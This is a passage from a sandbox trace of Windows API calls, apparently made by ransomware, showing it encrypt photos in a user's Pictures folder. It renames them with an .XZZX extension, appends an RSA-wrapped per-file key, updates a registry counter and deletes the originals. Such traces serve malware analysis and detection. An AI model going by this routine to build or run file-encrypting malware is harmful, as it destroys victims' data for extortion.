lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x10, lpOverlapped=0x0) returned 1 [0125.334] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe6b3 [0125.334] WriteFile (in: hFile=0x5fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.334] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe6b8 [0125.334] SetErrorMode (uMode=0x1) returned 0x1 [0125.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.334] OutputDebugStringW (lpOutputString="end") [0125.334] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.334] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0125.334] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce3160) returned 1 [0125.334] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce3160, dwCertEncodingType=0x1, pInfo=0x3d0d478*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d4a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d4b0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cdde18) returned 1 [0125.335] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.335] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.335] CryptEncrypt (in: hKey=0x3cdde18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0125.335] CryptEncrypt (in: hKey=0x3cdde18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce31e8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce31e8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0125.335] WriteFile (in: hFile=0x5fc, lpBuffer=0x3ce31e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce31e8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0125.335] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.335] WriteFile (in: hFile=0x5fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.335] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0125.336] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.336] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5f4) returned 0x0 [0125.336] RegQueryValueExW (in: hKey=0x5f4, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x94, lpcbData=0x420dfdc*=0x4) returned 0x0 [0125.336] RegCloseKey (hKey=0x5f4) returned 0x0 [0125.336] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5f4) returned 0x0 [0125.336] RegSetValueExW (in: hKey=0x5f4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x95, cbData=0x4 | out: lpData=0x420dfec*=0x95) returned 0x0 [0125.336] RegCloseKey (hKey=0x5f4) returned 0x0 [0125.336] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.336] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.337] CloseHandle (hObject=0x5fc) returned 1 [0125.337] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.338] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.338] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3NI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k3ni.jpg")) returned 1 [0125.339] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3NI.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k3ni.jpg")) returned 0 Thread: id = 413 os_tid = 0x984 [0125.340] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.340] lstrcpyW (in: lpString1=0x434f460, lpString2="kfqhp.png" | out: lpString1="kfqhp.png") returned="kfqhp.png" [0125.340] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.340] SetErrorMode (uMode=0x1) returned 0x1 [0125.340] lstrcpyW (in: lpString1=0x434f860, lpString2="kfqhp.png" | out: lpString1="kfqhp.png") returned="kfqhp.png" [0125.340] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xb6a2a158, Data2=0xe8fa, Data3=0x4e09, Data4=([0]=0xac, [1]=0xa8, [2]=0x8c, [3]=0xec, [4]=0x7e, [5]=0xe3, [6]=0x55, [7]=0x1a))) returned 0x0 [0125.340] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kfqhp.png") returned 52 [0125.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0125.340] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BD094FF047045CCAB6A2A1584B394112.XZZX") returned 80 [0125.340] StrStrW (lpFirst="kfqhp.png", lpSrch="XZZX") returned 0x0 [0125.340] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kfqhp.png", dwFileAttributes=0x20) returned 1 [0125.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kfqhp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kfqhp.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0125.341] ReadFile (in: hFile=0x600, lpBuffer=0x4360048, nNumberOfBytesToRead=0x8288, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesRead=0x434e418*=0x8288, lpOverlapped=0x0) returned 1 [0125.342] CloseHandle (hObject=0x600) returned 1 [0125.342] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0125.342] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0125.343] SetErrorMode (uMode=0x1) returned 0x1 [0125.343] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0125.343] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce3270) returned 1 [0125.345] CryptGenKey (in: hProv=0x3ce3270, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0125.503] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0125.503] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0125.504] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.504] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.504] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0125.504] CryptReleaseContext (hProv=0x3ce3270, dwFlags=0x0) returned 1 [0125.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BD094FF047045CCAB6A2A1584B394112.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bd094ff047045ccab6a2a1584b394112.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0125.505] WriteFile (in: hFile=0x600, lpBuffer=0x4360048*, nNumberOfBytesToWrite=0x8288, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesWritten=0x434e438*=0x8288, lpOverlapped=0x0) returned 1 [0125.506] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8288 [0125.507] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0125.507] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x828d [0125.507] WriteFile (in: hFile=0x600, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x12, lpOverlapped=0x0) returned 1 [0125.507] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x829f [0125.507] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0125.507] SetFilePointer (in: hFile=0x600, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x82a4 [0125.507] SetErrorMode (uMode=0x1) returned 0x1 [0125.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.507] OutputDebugStringW (lpOutputString="end") [0125.508] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.508] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0125.508] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3ce3270) returned 1 [0125.508] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce3270, dwCertEncodingType=0x1, pInfo=0x3d0d548*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d578*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d580*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cdde58) returned 1 [0125.508] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.509] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.509] CryptEncrypt (in: hKey=0x3cdde58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0125.509] CryptEncrypt (in: hKey=0x3cdde58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce32f8*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce32f8*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0125.509] WriteFile (in: hFile=0x600, lpBuffer=0x3ce32f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce32f8*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0125.509] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.510] WriteFile (in: hFile=0x600, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0125.510] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0125.511] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.511] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x604) returned 0x0 [0125.511] RegQueryValueExW (in: hKey=0x604, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x95, lpcbData=0x434dfdc*=0x4) returned 0x0 [0125.511] RegCloseKey (hKey=0x604) returned 0x0 [0125.511] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x604) returned 0x0 [0125.511] RegSetValueExW (in: hKey=0x604, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x96, cbData=0x4 | out: lpData=0x434dfec*=0x96) returned 0x0 [0125.511] RegCloseKey (hKey=0x604) returned 0x0 [0125.511] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.512] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.512] CloseHandle (hObject=0x600) returned 1 [0125.513] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.514] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.514] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kfqhp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kfqhp.png")) returned 1 [0125.515] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kfqhp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kfqhp.png")) returned 0 Thread: id = 414 os_tid = 0x988 [0125.515] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.516] lstrcpyW (in: lpString1=0x420f460, lpString2="LiEtBonze.png" | out: lpString1="LiEtBonze.png") returned="LiEtBonze.png" [0125.516] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.516] SetErrorMode (uMode=0x1) returned 0x1 [0125.516] lstrcpyW (in: lpString1=0x420f860, lpString2="LiEtBonze.png" | out: lpString1="LiEtBonze.png") returned="LiEtBonze.png" [0125.516] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x53677ef5, Data2=0xd790, Data3=0x4c56, Data4=([0]=0x93, [1]=0x45, [2]=0xf5, [3]=0xff, [4]=0x74, [5]=0x95, [6]=0x6b, [7]=0xe5))) returned 0x0 [0125.516] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LiEtBonze.png") returned 56 [0125.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0125.516] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D5D72CD040472A6053677EF544680EA8.XZZX") returned 80 [0125.516] StrStrW (lpFirst="LiEtBonze.png", lpSrch="XZZX") returned 0x0 [0125.516] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LiEtBonze.png", dwFileAttributes=0x20) returned 1 [0125.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LiEtBonze.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lietbonze.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f8 [0125.516] ReadFile (in: hFile=0x5f8, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x1705a, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0x1705a, lpOverlapped=0x0) returned 1 [0125.518] CloseHandle (hObject=0x5f8) returned 1 [0125.518] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0125.518] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0125.518] SetErrorMode (uMode=0x1) returned 0x1 [0125.518] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0125.518] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce3380) returned 1 [0125.521] CryptGenKey (in: hProv=0x3ce3380, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0125.707] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.707] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x420e41c | out: pbData=0x40a0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.707] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.708] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.708] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0125.708] CryptReleaseContext (hProv=0x3ce3380, dwFlags=0x0) returned 1 [0125.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D5D72CD040472A6053677EF544680EA8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\d5d72cd040472a6053677ef544680ea8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x604 [0125.709] WriteFile (in: hFile=0x604, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x1705a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0x1705a, lpOverlapped=0x0) returned 1 [0125.710] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1705a [0125.710] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.710] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1705f [0125.710] WriteFile (in: hFile=0x604, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x1a, lpOverlapped=0x0) returned 1 [0125.710] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 